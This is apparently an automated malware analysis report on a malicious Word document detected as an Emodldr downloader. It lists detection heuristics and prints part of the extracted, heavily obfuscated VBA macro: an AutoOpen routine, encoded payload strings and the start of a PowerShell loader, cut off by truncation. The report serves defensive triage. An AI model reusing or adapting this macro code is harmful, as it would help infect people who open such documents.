MALICIOUS
Risk Score: 244
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro uses the Shell() function to execute a command, likely to download and run a second-stage payload. The presence of the 'Doc.Malware.Emodldr' ClamAV signature further confirms its malicious nature.
Heuristics (8)
- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 145645 bytes |

SHA-256: 0d7034bc4489b2fde5b39de6f1e9da289045ad38e994a86bbc72dcbf74165873

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 34 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "APVizGouWKrjX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
ZrWQE = CByte(XKhEN)
LrRim = AmwFio
pqunD = Cos(2693 - Oct(77784 + wODzu * OAZmOI - CBool(TEaiZ)))
Application.Run tJLUI + "jXPwwWIQJ" + CPbcXd, YMMcO + TZzzjzHSvu + rMllXT
fDVlU = CByte(ijusm)
uRrWnY = ILkwG
MDhHHY = Cos(77872 - Oct(1975 + CztpIT * VdUaiT - CBool(AqwNV)))
End Sub
Attribute VB_Name = "IvEPKHAz"
Sub nUztH(scwQi)
pGift = CByte(phRJLS)
fGuiiA = Cwqzd
MzHNAw = Cos(75134 - Oct(3962 + pakRN * QHdJi - CBool(bHwwT)))
End Sub
Function TZzzjzHSvu()
On Error Resume Next
jJbZOz = CByte(Zrjuc)
JKiYW = TOTLqP
dFTwEm = Cos(28073 - Oct(4551 + YdjQMr * SGLDv - CBool(hlzbC)))
OawhQizu = VJpSA("uu.uwE2ADEANAA4ADEAYgA0AGUAMwA4ADMANAA5AGYAOQAwADYAZgA1ADQAMAAxADUAMwAyAGYAOAA2ADYAYwBlADIAOQA4ADjKo", 7 + iuZBlf - iuZBlf, 91 + iuZBlf - iuZBlf)
kMzlJS = CByte(JGsbI)
HOlFp = hcpBF
MAYXiA = Cos(57497 - Oct(68904 + ShasZw * hSZiDq - CBool(qwjIVU)))
tjhzm = CByte(EAchk)
hrVaf = IrEomE
pYkUpr = Cos(40275 - Oct(77928 + vaGSXL * nwLPE - CBool(BZjiX)))
qopGlKTAz = VJpSA("2NqNgA1AGUANwA1ADUAZAAyAGEANwAxADYAZQAwADUAYQA4AGUbmT", 4 + uLsGzR - uLsGzR, 47 + uLsGzR - uLsGzR)
qvEwdE = CByte(sUjmpP)
iwvTNc = URsbpq
WLnHUo = Cos(96511 - Oct(6972 + idOZTC * JVzVi - CBool(dNVuj)))
FQkzS = CByte(COhwY)
zurGj = TukEBb
VEWYtZ = Cos(62357 - Oct(42505 + JhJYlG * fOZkz - CBool(NJrRoE)))
cbSnYd = VJpSA("LWNgA2AGYAMwAwAGYAMQA1AGUAOQA2ADEAYwAyADkAMwBkAGIAZAA3AGMAZQAzADQAMAA5AGMANwA2AGEAYQAwAGUAZAA5AD6zW8", 3 + iMUnO - iMUnO, 94 + iMUnO - iMUnO)
UAPIF = CByte(QfqoYs)
ZlJzIG = dEqbr
rqNjbl = Cos(53667 - Oct(36864 + IRASo * koZArP - CBool(czuJh)))
jBPHo = CByte(oQNqFR)
cQDQG = dvbIU
klfLHO = Cos(78972 - Oct(96995 + wQvvkv * PJlZwv - CBool(TEJil)))
ZPGrzC = VJpSA("zLi7u0ADQAYwA2AGYAMgAzADQANgA0ADMAOAA4ADIANABkAGEANQAwADUAYgA1ADQAYwBlAqh", 7 + ZPKnRK - ZPKnRK, 65 + ZPKnRK - ZPKnRK)
bFtvOD = CByte(IFGcQ)
YdzIU = XhjRW
vpjMGz = Cos(68774 - Oct(6924 + RtXAj * hnJDJJ - CBool(WbUwoI)))
tCMzXJ = CByte(Rzzjs)
MVWmWw = ZcfNRi
uhGMG = Cos(23232 - Oct(48858 + uQERo * Fvmwi - CBool(OCTQo)))
tRwRPQIq = VJpSA("whADcLYZKIbr", 3 + DvnWA - DvnWA, 3 + DvnWA - DvnWA)
zPQWw = CByte(slOjtk)
fLEbGi = IrUht
iGJsN = Cos(82195 - Oct(46269 + OJrYRW * DtVCB - CBool(CMJaN)))
dCPujD = CByte(amlMwQ)
JzCvA = iGQKb
qQVfJ = Cos(61545 - Oct(65042 + biWZHX * uGmIL - CBool(DzFnw)))
IjbEPiotzU = VJpSA("iSQiQAOAA5ADMANQBlADYAMwA2AGYAYwA5ADEANwBmAGYAYQBmAGIAZQA1ADMAZABhADcANAAzAGIAYgBmADkAYwAwADMAZABhAGIAOQAwAGQAMWT", 5 + jOGvjc - jOGvjc, 107 + jOGvjc - jOGvjc)
JUWlFT = CByte(NdEGc)
QSbabd = cFjAiB
AmSPs = Cos(21736 - Oct(6255 + iEzQF * KipzKb - CBool(EcWiKK)))
PabSfF = CByte(SvjVm)
MCiSQ = IzEdX
WQFURG = Cos(98612 - Oct(66520 + FMCQlK * lkjEl - CBool(clQDuO)))
wwQJni = VJpSA("YobAGIANABkAGEANgBjAGMAWS.v", 4 + EkWHE - EkWHE, 20 + EkWHE - EkWHE)
vLzDpJ = CByte(zzidWE)
HqfBi = vMTwS
doTENL = Cos(70698 - Oct(85119 + uOwbc * QnGCi - CBool(oVvkBP)))
mqBKE = CByte(kiPjJ)
GMtGm = TkOsGG
FifIwX = Cos(59551 - Oct(12654 + OvpXAJ * nqiXk - CBool(HCwhL)))
VkiCc = VJpSA("@wBlADMAMAA5AGEANwA5AGEAZQA1AGYAMgA1ADkAMgA1ADAANQBkADMAMAA2ADYANgBhAGYAOIuT@7bt", 2 + vjrAk - vjrAk, 72 + vjrAk - vjrAk)
nuuku = CByte(zhEaS)
iSJwz = PjKPb
YiNzb = Cos(56171 - Oct(19162 + LTTDT * uKBbQ - CBool(XYtSw)))
sdNIRM = CByte(GcGoF)
jiwVj = mLJwh
JLIoPX = Cos(51372 - Oct(60400 + VXFRm * nPauz - CBool(TYnvio)))
OViviM = VJpSA("6%3BzAGUAYgA0AGMAZAA5AGMAMQBjADEANgA0AGEANQBmAGYANABlAGYANgA4ADIAZAA1AGEANQ0b", 5 + EjSfB - EjSfB, 71 + EjSfB - EjSfB)
AcjifV = CByte(AQSMj)
awOGs = uMzwi
iqqnU = Cos(86167 - Oct(64698 + lfslsZ * iAWzOL - CBool(WVKhDi)))
FvTFhJ = CByte(HiEkbG)
DSoHz = KWqYtj
sVHvzM = Cos(33935 - Oct(84811 + oiuDbJ * nLOjp - CBool(jldlz)))
chjzjTEi = VJpSA("KH([RuntIme.iNTeroPsErVICES.mARshAL]::PtRToStRinGUNi([RUNtimE.INTEroPSeRVICeS.
... (truncated)